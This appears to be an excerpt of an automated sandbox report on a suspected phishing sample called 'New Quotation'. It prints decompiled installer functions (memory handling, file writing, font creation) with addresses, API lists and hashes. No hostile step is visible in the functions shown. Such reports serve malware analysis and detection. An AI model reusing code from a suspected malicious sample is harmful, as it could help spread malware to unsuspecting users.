                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                          • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                          • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71092655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E71092655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E710912BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M71092784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7109407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7109409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E71091510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7109506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7109506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7109506c);
								goto L17;
							case 5:
								_push( *0x7109506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x71095000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E71091381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E71091312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                                                                                                                          0x7109265f
                                                                                                                                                                                          0x71092661
                                                                                                                                                                                          0x71092665
                                                                                                                                                                                          0x71092674
                                                                                                                                                                                          0x71092678
                                                                                                                                                                                          0x7109267d
                                                                                                                                                                                          0x7109267d
                                                                                                                                                                                          0x71092685
                                                                                                                                                                                          0x7109268c
                                                                                                                                                                                          0x71092692
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092699
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710926a1
                                                                                                                                                                                          0x710926a5
                                                                                                                                                                                          0x710926a8
                                                                                                                                                                                          0x710926ac
                                                                                                                                                                                          0x710926b3
                                                                                                                                                                                          0x710926b7
                                                                                                                                                                                          0x710926bd
                                                                                                                                                                                          0x710926bf
                                                                                                                                                                                          0x710926c1
                                                                                                                                                                                          0x710926c1
                                                                                                                                                                                          0x710926c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710926d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710926d8
                                                                                                                                                                                          0x710926de
                                                                                                                                                                                          0x710926e8
                                                                                                                                                                                          0x710926ee
                                                                                                                                                                                          0x710926f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092714
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710926fa
                                                                                                                                                                                          0x71092700
                                                                                                                                                                                          0x71092701
                                                                                                                                                                                          0x71092703
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109271c
                                                                                                                                                                                          0x7109271e
                                                                                                                                                                                          0x71092724
                                                                                                                                                                                          0x7109272a
                                                                                                                                                                                          0x7109272a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092692
                                                                                                                                                                                          0x7109272d
                                                                                                                                                                                          0x7109272d
                                                                                                                                                                                          0x71092732
                                                                                                                                                                                          0x71092743
                                                                                                                                                                                          0x71092743
                                                                                                                                                                                          0x71092749
                                                                                                                                                                                          0x7109274e
                                                                                                                                                                                          0x71092753
                                                                                                                                                                                          0x7109275f
                                                                                                                                                                                          0x71092764
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092769
                                                                                                                                                                                          0x71092755
                                                                                                                                                                                          0x71092756
                                                                                                                                                                                          0x7109276a
                                                                                                                                                                                          0x7109276a
                                                                                                                                                                                          0x71092753
                                                                                                                                                                                          0x7109276b
                                                                                                                                                                                          0x7109276c
                                                                                                                                                                                          0x7109276f
                                                                                                                                                                                          0x71092783

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 710912BB: GlobalAlloc.KERNEL32(00000040,?,710912DB,?,7109137F,00000019,710911CA,-000000A0), ref: 710912C5
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 71092743
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 71092778
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          • Opcode ID: fda6cbeafe638150d42298c0617291d90d333a905043c3ead231351b295e3ab6
                                                                                                                                                                                          • Instruction ID: a5821be32343c9aa763f007575a74530b51c1388fff6f61b9a6092b01561ca84
                                                                                                                                                                                          • Opcode Fuzzy Hash: fda6cbeafe638150d42298c0617291d90d333a905043c3ead231351b295e3ab6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C631D272208102EFC7179F76C9B4E2EB7B7FBC5B043264569F142A3120C7325814EBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                                                                                          0x00402950
                                                                                                                                                                                          0x00402952
                                                                                                                                                                                          0x00402957
                                                                                                                                                                                          0x0040295c
                                                                                                                                                                                          0x0040295f
                                                                                                                                                                                          0x00402969
                                                                                                                                                                                          0x0040296d
                                                                                                                                                                                          0x0040296d
                                                                                                                                                                                          0x00402973
                                                                                                                                                                                          0x00402980
                                                                                                                                                                                          0x00402988
                                                                                                                                                                                          0x0040298b
                                                                                                                                                                                          0x00402997
                                                                                                                                                                                          0x0040299a
                                                                                                                                                                                          0x004029a0
                                                                                                                                                                                          0x004029ae
                                                                                                                                                                                          0x004029b3
                                                                                                                                                                                          0x004029b7
                                                                                                                                                                                          0x004029ba
                                                                                                                                                                                          0x004029c3
                                                                                                                                                                                          0x004029cf
                                                                                                                                                                                          0x004029d3
                                                                                                                                                                                          0x004029d6
                                                                                                                                                                                          0x004029e0
                                                                                                                                                                                          0x004029ff
                                                                                                                                                                                          0x004029ec
                                                                                                                                                                                          0x004029f4
                                                                                                                                                                                          0x004029f7
                                                                                                                                                                                          0x004029fc
                                                                                                                                                                                          0x004029fc
                                                                                                                                                                                          0x00402a06
                                                                                                                                                                                          0x00402a06
                                                                                                                                                                                          0x00402a13
                                                                                                                                                                                          0x00402a19
                                                                                                                                                                                          0x00402a1f
                                                                                                                                                                                          0x00402a1f
                                                                                                                                                                                          0x004029b7
                                                                                                                                                                                          0x00402a33
                                                                                                                                                                                          0x00402a35
                                                                                                                                                                                          0x00402a35
                                                                                                                                                                                          0x00402a3f
                                                                                                                                                                                          0x00402a40
                                                                                                                                                                                          0x00402a44
                                                                                                                                                                                          0x00402a48
                                                                                                                                                                                          0x00402a4e
                                                                                                                                                                                          0x00402a4e
                                                                                                                                                                                          0x00402a55
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                          • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                          • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71092480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E71092480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7109135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E710912E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M710925F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E710913B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E710913B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7109506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7109506c, __eax,  *0x7109506c, 0, 0);
									goto L27;
								case 4:
									__eax = E710912CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E710913B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7109506c =  *0x71095074 + ( *(__esi + 0x18) - 1) *  *0x7109506c * 2 + 0x18;
									 *__ebx =  *0x71095074 + ( *(__esi + 0x18) - 1) *  *0x7109506c * 2 + 0x18;
									asm("cdq");
									__eax = E71091510(__edx,  *0x71095074 + ( *(__esi + 0x18) - 1) *  *0x7109506c * 2 + 0x18, __edx,  *0x71095074 + ( *(__esi + 0x18) - 1) *  *0x7109506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E710912CC(0x71095044);
					goto L10;
				}
			}











                                                                                                                                                                                          0x71092494
                                                                                                                                                                                          0x71092498
                                                                                                                                                                                          0x710924a3
                                                                                                                                                                                          0x710924a3
                                                                                                                                                                                          0x710924aa
                                                                                                                                                                                          0x710924af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710924b3
                                                                                                                                                                                          0x710924b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710924bb
                                                                                                                                                                                          0x710924c6
                                                                                                                                                                                          0x710924d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710924cd
                                                                                                                                                                                          0x710924cf
                                                                                                                                                                                          0x710924e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710924e5
                                                                                                                                                                                          0x710924bd
                                                                                                                                                                                          0x710924bd
                                                                                                                                                                                          0x710924e6
                                                                                                                                                                                          0x710924e6
                                                                                                                                                                                          0x710924e8
                                                                                                                                                                                          0x710924ec
                                                                                                                                                                                          0x710924ec
                                                                                                                                                                                          0x710924ef
                                                                                                                                                                                          0x710924ef
                                                                                                                                                                                          0x710924f7
                                                                                                                                                                                          0x710924ff
                                                                                                                                                                                          0x71092502
                                                                                                                                                                                          0x710925c1
                                                                                                                                                                                          0x710925c2
                                                                                                                                                                                          0x710925cd
                                                                                                                                                                                          0x710925f7
                                                                                                                                                                                          0x710925f7
                                                                                                                                                                                          0x710925dd
                                                                                                                                                                                          0x710925e9
                                                                                                                                                                                          0x710925df
                                                                                                                                                                                          0x710925df
                                                                                                                                                                                          0x710925df
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092508
                                                                                                                                                                                          0x71092508
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109250f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092517
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092525
                                                                                                                                                                                          0x71092527
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092548
                                                                                                                                                                                          0x7109254e
                                                                                                                                                                                          0x71092551
                                                                                                                                                                                          0x71092553
                                                                                                                                                                                          0x71092563
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092530
                                                                                                                                                                                          0x71092535
                                                                                                                                                                                          0x71092538
                                                                                                                                                                                          0x71092539
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109256f
                                                                                                                                                                                          0x71092575
                                                                                                                                                                                          0x71092576
                                                                                                                                                                                          0x71092579
                                                                                                                                                                                          0x7109257a
                                                                                                                                                                                          0x7109257c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092588
                                                                                                                                                                                          0x7109258b
                                                                                                                                                                                          0x71092597
                                                                                                                                                                                          0x71092599
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710925a5
                                                                                                                                                                                          0x710925b1
                                                                                                                                                                                          0x710925b4
                                                                                                                                                                                          0x710925b6
                                                                                                                                                                                          0x710925b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71092508
                                                                                                                                                                                          0x71092502
                                                                                                                                                                                          0x710924db
                                                                                                                                                                                          0x710924e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710924e0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 710925C2
                                                                                                                                                                                            • Part of subcall function 710912CC: lstrcpynW.KERNEL32(00000000,?,7109137F,00000019,710911CA,-000000A0), ref: 710912DC
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 71092548
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71092563
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                          • Opcode ID: 3e38066a9499d87dc008619bb56724980787f3e95afed0481fa0391ec0c8e790
                                                                                                                                                                                          • Instruction ID: 3637c288e736fc442770844a917c18e0645a1af579287a40dd20ba054dc07045
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e38066a9499d87dc008619bb56724980787f3e95afed0481fa0391ec0c8e790
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4841CCB1108306EFD315DF359870A2A77F9FB84B10F12895EF487C6180EB31A548EBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                          			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                                          0x00401e4e
                                                                                                                                                                                          0x00401e59
                                                                                                                                                                                          0x00401e5b
                                                                                                                                                                                          0x00401e68
                                                                                                                                                                                          0x00401e7f
                                                                                                                                                                                          0x00401e84
                                                                                                                                                                                          0x00401e91
                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                          0x00401e9a
                                                                                                                                                                                          0x00401ea5
                                                                                                                                                                                          0x00401eac
                                                                                                                                                                                          0x00401ebe
                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                          0x00401ec9
                                                                                                                                                                                          0x00401ed3
                                                                                                                                                                                          0x00402638
                                                                                                                                                                                          0x0040156d
                                                                                                                                                                                          0x00402ba4
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2584051700-0
                                                                                                                                                                                          • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                          • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
